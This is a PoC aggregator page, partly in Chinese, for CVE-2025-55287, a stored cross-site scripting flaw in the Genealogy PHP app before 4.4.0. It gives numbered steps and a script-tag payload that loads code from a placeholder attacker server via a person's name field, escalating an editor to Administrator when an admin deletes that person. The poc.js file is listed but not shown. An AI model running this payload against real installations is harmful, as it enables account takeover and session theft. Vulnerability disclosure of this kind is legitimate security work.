POC详情: c07846d39eda9615de2ef2eea28028cdc67fd9a1

来源
关联漏洞
标题: Genealogy 跨站脚本漏洞 (CVE-2025-55287)
描述:Genealogy是KREAWEB.be个人开发者的一个的家谱PHP应用程序。 Genealogy 4.4.0之前版本存在跨站脚本漏洞,该漏洞源于存储型跨站脚本漏洞,可能导致会话劫持和数据窃取。
描述
Authenticated stored XSS priv esc PoC. Affects Genealogy versions prior to 4.4.0
介绍
# CVE-2025-55287-POC
Authenticated Stored Cross-Site Scripting (XSS) in Genealogy app prior to 4.4.0 allows arbitrary JavaScript execution and privilege escalation from Editor+ role to Administrator.

###### Summary

- Vulnerability type: Stored Cross-Site Scripting (CWE-79)
- Affected component: 'Person' firstname and lastname.
- Affected versions: All versions prior to 4.4.0
- Impact: Persistent execution of attacker-supplied JavaScript in victims’ browsers; session hijacking, CSRF via DOM, UI redress, credential theft, or arbitrary actions as the victim.
- Attack vector: Authenticated (any role with new person creation - editor+)

###### Exploiting

Root-cause: Inadequate server-side sanitisation/encoding of the persons firstname/lastname upon succesful delete of the affected person by a higher privileged user.

PoC:

1. Authenticate to the application (editor+ role).
2. Create a new person (does not necessiraly needs to be assigned to any family).
3. Include the JavaScript as either the first name or last name of the added person:
   ```<script src='yourserver/poc.js'></script>```
4. Edit the poc.js with your email address in the placeholder.
5. Once a privileged user attempts to delete the newly added person, you will receive an invite to the platform on the provided email address with the role of Administrator.

文件快照

[4.0K] /data/pocs/c07846d39eda9615de2ef2eea28028cdc67fd9a1 ├── [1.3K] poc.js └── [1.3K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。